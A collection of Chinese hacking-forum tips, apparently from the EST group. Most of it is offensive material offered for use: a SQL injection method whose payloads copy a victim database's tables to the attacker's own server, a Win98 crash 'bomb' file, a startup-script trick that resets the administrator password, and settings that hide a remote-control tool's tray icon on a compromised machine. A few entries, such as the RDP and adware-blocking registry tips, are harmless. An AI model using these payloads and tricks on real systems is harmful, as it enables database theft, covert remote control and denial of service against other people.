在CMD下共享某盘
By Sunlion[EST]

今天在局域网内闲逛，进入了一台无法上传东西的电脑，后来发现他共享了点东西，但是我想要的东西，他没有共享，于是就想起了
NET SHARE sharename
   sharename=drive:path [/USERS:number | /UNLIMITED]
        [/REMARK:"text"]
        [/CACHE:Manual | Automatic | No ]
   sharename [/USERS:number | /UNLIMITED]
      [/REMARK:"text"]
      [/CACHE:Manual | Automatic | No ]
   {sharename | devicename | drive:path} /DELETE
*******************（以上是在CMD下系统给的提示）******************
但是我弄了半天没出来，对系统提示的理解有点问题，特别是sharename=drive:path
所以，我问了一下无锋之刃大哥，于是等到以下答案：
***********************************************************
(2004-10-27 16:53:05)  无锋之刃
F:\test\wxfile\Release>net share test=d: /remark:"testing"  test 共享成功。
***********************************************************
呵呵！在此谢谢无锋之刃大哥！：）
假如大家要共享G盘
那么在提示副下输入：
net share G=g: /UNLIMITED /remark:"默认共享"
其中在=前面是共享的名称，/unlimited 表示无限制 /remark:""就是共享的备注
呵呵！估计也会有好多兄弟走了弯路吧！

用快捷方式最炸弹4Win98

如下内容写入txt
[InternetShortcut]
URL=http://127.0.0.1/
IconIndex=1
IconFile=C:\con\con.dll
命名为bomb.URL放C:\Windows\temp下
浏览这个目录.....兰屏

传说中恢复2KXP管理员帐号的方法

传说中 可能不准确...
编写一个批处理EvilOctal.bat内容：
net user administrator EvilOctal
然后放在...没有？建立尝试一下吧 我也不清楚
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
在其他的电脑上编辑Script.ini文件 格式如下：
（先空一行）
[Startup]
0CmdLine=加载的脚本名称 我们这里应该是EvilOctal.bat
0Parameters=接参数 空就可以了
[Shutdown]
0CmdLine=加载的关机脚本名称
0Parameters=接参数 空就可以了

这样就编辑完毕
然后想办法把bat拷到
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup下
把Script.ini拷到
C:\WINDOWS\system32\GroupPolicy\Machine\Machine\Scripts\下
重新启动就OK
这样？如果C不是FAT还是麻烦：（

奇怪的IP数据包
IP包头的协议号为181 请问什么样的设备或者软件协议使用这个协议号？

181 ADC Kentrox Bruce Kropp ktxc8!bruce@uunet.UU.NET

DWRCC 的远程链接图标删除

这个文件是这样的
[Settings]
;Property Page 1
:Port - 6129 is default
;Port=6129

;Absolute Timeout - in minutes
;Absolute Timeout=5

;Authentication Type - default is 6 (2 + 4)
;1 = Allow Proprietary Challenge/Response
;2 = Allow Windows NT Challenge/Response
;4 = Allow Encrypted (128 bit) Windows Logon
;Add the numbers to allow more then one i.e. 7 would be all (1 + 2 + 4)
;Authentication Type=6
Authentication Type=6

;Must Have Logon Locally Rights with Windows Logon - default if Yes
;Only valid with use of "Allow Encrypted (128 bit) Windows Logon"
;Must Have Logon Locally Rights with Windows Logon=Yes
;Must Have Logon Locally Rights with Windows Logon=No


;Property Page 2
;Requires Explicit Remote Admin Rights - default is No
;Requires Explicit Remote Admin Rights=No

;Allow Only Administrators To Connect - default in No
;Allow Only Administrators To Connect=No

;Requires Logon Locally Privilege - default is No
;Requires Logon Locally Privilege=No
…………
（后面省略）
…………

DWRCS.EXE就是在你肉鸡系统托盘上一闪一闪的那个图标,
要防止它在托盘出现,就给Dwrcs.ini前面加上下面这段:
[Settings]
Port=6129
Adgang NTLM=Yes
Adgang 1=
Adgang 2=
Adgang 3=0
Notify On New Connection=No
Permission Required=No
Show SysTray Icon=No
Permission Required for non Admin=Yes
On Disconnect Logoff Desktop=No
Force Applications Close=No
On Disconnect Lock Workstation=No
Logon At Logon Desktop Only=No
Enable Add Client Connection Menu=Yes
Enable Disconnection Menu=Yes

修改Terminal Server的端口

服务端
进入注册表编辑器，依次展开如下键名：
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp
在右窗口中修改PortNumber的数值为任意端口号，推荐1025<端口号<65535
客户端
启动Terminal Server Client的客户端管理器，到出连接文件为*.cns，用记事本打开修改Server Port与服务器一致就OK了.
最后将修改过的*.cns重新导入Terminal Server Client的客户端管理器。

揪出FlashGet中的暗纹密码
By 电脑教育报

FlashGet中有两个地方的密码会以星号密文显示，虽然这会提高软件的安全性，不过可能会对我们查看、共享信息带来了不便。下面介绍一下如何通过eXeScope这款汉化工具修改FlashGet来达到以明文显示密码的目的。

　　1． 让FlashGet中的站点资源探索器密码以明文显示

　　运行eXeScope，选择“文件→打开”，定位到FlashGet安装目录中的“FlashGet.exe”文件，依次展开“资源→对话框→128”，接下来在右侧的“Dialog:128”栏下选中“Edit”，单击“编辑”标签，勾选“密码”一项，最后保存退出即可，如图所示。
　　编辑提示：在编辑FlashGet文件的时候，请先退出FlashGet程序，否则会提示错误信息。

　　2． 让FlashGet中的代理服务器地址以明文显示

　　与上述方法类似，运行eXeScope，选择“文件→打开”菜单下的FlashGet.exe文件，依次展开“资源→对话框→149”，接下来在右侧的“Dialog:149”栏下选中“Edit”，单击“编辑”标签，勾选“密码”一项，设置完毕后保存退出。

在GATEWAY的封锁下使用OICQ
By 冰血封情[EST]

这位朋友，我没看明白您说的是什么意思？是公司的服務器不提供代理服务了，还是只是把8000换成了其他的端口呢？？不过也管不了那么多了：）我还是就两种情况都分析一下吧……
第一种、把8000换成了其他的端口：
这个好办，只要使用扫描软件对网关服务器进行端口扫描，看看哪个端口开了Socks服务，就在QQ里面设置代理服务器，把端口和IP填上连接就可以了！
第二种、服務器不提供代理服务：
这个有点麻烦，但是还是可以解决的，如果您的QQ是会员号，那么可以选择使用HTTP协议登录，那样只要服务器开了HTTPPROXY就可以了（就是可浏览网页）！那么您一定会问，要是我不是会员号怎么办啊？那也没关系，我们可以把HTTP和SOCKS两种协议进行转换，具体方法如下。
有一款叫SocksOnline的软件（http://www.waysonline.com/mader/download/），可以帮你实现……具体……
第一步、启动，第一次运行要设置登录帐号，看着填就可以了。然后进入‘设置’-‘通讯设置’-‘HTTP通讯设置’，选中‘用户指定’，然后在框中相应填入公司服务器的IP和HTTP端口（因公司设置的HTTPPROXY端口而定，一般是80）；
第二步、进入‘设置’-‘系统设置’-‘用户服务设置’，在‘主机’处填入腾讯服务器的地址（这个有很多，你自己可以在QQ系统设置里看到），然后‘端口’填入8000（这里是腾讯的服务器端口不是你公司的），本机端口：4000；
第三步、在自己的OICQ，进入‘登陆向导’的界面的‘网络设置’，选择使用Socks5代理，然后在那里填入IP：127.0.0.1、端口：1080，其他的空着……
现在你可以登陆你的QQ来爽了：）
当然，如果其他的朋友想上QQ，只要把你的计算机开起，然后设置你的内网IP为代理，端口1080就可以了，不用再自己设置上面，当然想拖动你的好朋友一起上，你得付出点自己的系统资源……

冰血封情这么喜欢用注册表限制啊？
好啊，我也弄几个限制
限制我最讨厌的垃圾插件
对付３７２１的注册表脚本
REGEDIT4
#B83FC273-3522-4CC6-92EC-75CC86678DA4 /3721网络实名
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B83FC273-3522-4CC6-92EC-75CC86678DA4}]
"Compatibility Flags"=dword:00000400
#1B0E7716-898E-48CC-9690-4E338E8DE1D3 /3721上网助手
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1B0E7716-898E-48CC-9690-4E338E8DE1D3}]
"Compatibility Flags"=dword:00000400
#7CA83CF1-3AEA-42D0-A4E3-1594FC6E48B2 /3721上网助手
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7CA83CF1-3AEA-42D0-A4E3-1594FC6E48B2}]
"Compatibility Flags"=dword:00000400
#7CA83CF1-3AEA-42D0-A4E3-1594FC6E48B2 /3721网络实名
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4522DBFE-14CD-4A59-AC2A-54BADFDD6D53}]
"Compatibility Flags"=dword:00000400
#4EDBBAEA-F509-49F6-94D1-ECEC4BE5B686 /3721中文邮
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4EDBBAEA-F509-49F6-94D1-ECEC4BE5B686}]
"Compatibility Flags"=dword:00000400

对付百度的
#9BBC1154-218D-453C-97F6-A06582224D81 /百度搜霸
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9BBC1154-218D-453C-97F6-A06582224D81}]
"Compatibility Flags"=dword:00000400
#BC207F7D-3E63-4ACA-99B5-FB5F8428200C /百度搜索伴侣
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BC207F7D-3E63-4ACA-99B5-FB5F8428200C}]
"Compatibility Flags"=dword:00000400


呵呵，还我一个清净的空间，不再弹出这些垃圾插件．需要禁止不同的插件烦恼，可以参考修改．

3389登陆看不到界面问题
by  fhod[EST]

首先ctrl+alt+end调出远程的任务管理器...3389登陆的和本地的调出任务管理器的方法是不一样的

然后新建進程
explorer.exe没多会就看到了熟悉的界面了..
原理就不多说了
以后看不到桌面就看看进程是否有
explorer.exe
没有就新建个任务名为
explorer.exe

自动关闭停止响应程序

　　在注册表中打开HKEY_CURRENT_USER\Control Panel\Desktop目录，把里面的AugoEndTasks键值改为1。
如果注册表中找不到AutoEndTasks键值，则可以自己建一个串值并把它改为这个名字，值设为1就可以了。

注射的一些技巧
错了。。出错信息被屏蔽了。。怎么办？经过研究发现是里边的某些字符例如 +号需要转化成16进制。。或许还有别的地方要转化。。怎么办啊？
---------------------------------------------------------------------------------
这是浏览器导致的，并非对方的asp所谓，一些特殊符号不能直接在浏览器里面输入，
其实没有必要全部转换成%xx的模式，写个htm里面javascript
window.location.href=".....这里随便你了......"
就可以了，该转码的都会自己转码。

另外用sqlinject记住两点
浏览器选项高级里面
1. UTF8一定要关闭
2. 友好的http信息显示一定要关闭

另外如果要偷取一个对方库里面指定一个表的数据，简单的办法就是
假设你的本地sqlserver ip是202.99.8.1 sa空 1433 tcp 默认库pop
1。 创建一个表，两个个字段number和varchar(255)就可以，表名[tmp1]
2。 然后
news.asp?id=5 insert into opendatasource(&#39;sqloledb&#39;,&#39;driver={sql server};server=202.99.8.1;network=sbmssocn;address=202.99.8.1,1433;uid=sa;pwd=;database=pop&#39;).pop.dbo.tmp1 select [id],[name] from sysobjects where xtype=&#39;U&#39; --
3。 无看看你的tmp1的内容，找到你想要的那个表，比如[news]对应的id=12345
4。 在你的sqlserver执行 select * into [tmpcolumns] from syscolumns where 1=2
5。 然后
news.asp?id=5 insert into opendatasource(&#39;sqloledb&#39;,&#39;driver={sql server};server=202.99.8.1;network=sbmssocn;address=202.99.8.1,1433;uid=sa;pwd=;database=pop&#39;).pop.dbo.tmpcolumns select * from sysobjects where id=12345 --
6。 现在看看tmpcolumns你已经得到这个news的所有字段信息了
7。 根据字段本地创建创建新表[newtable]
8。 然后
news.asp?id=5 insert into opendatasource(&#39;sqloledb&#39;,&#39;driver={sql server};server=202.99.8.1;network=sbmssocn;address=202.99.8.1,1433;uid=sa;pwd=;database=pop&#39;).pop.dbo.newtable select * from [news] --

以上方法不需要猜测表名，也不需要是sysadmin，所以只要有sqlinject漏洞并且是sqlserver的话，那么绝大多数都可以通过。并且你可以指定你要的表你要的字段，而不需要去down整个庞大的库。

不过sqlinject真的没必要花太多的精力在上面。

注：select * into [tmpcolumns] from syscolumns where 1=2的1=2判断绝对没有写错，这么做是一种复制表结构的偷懒办法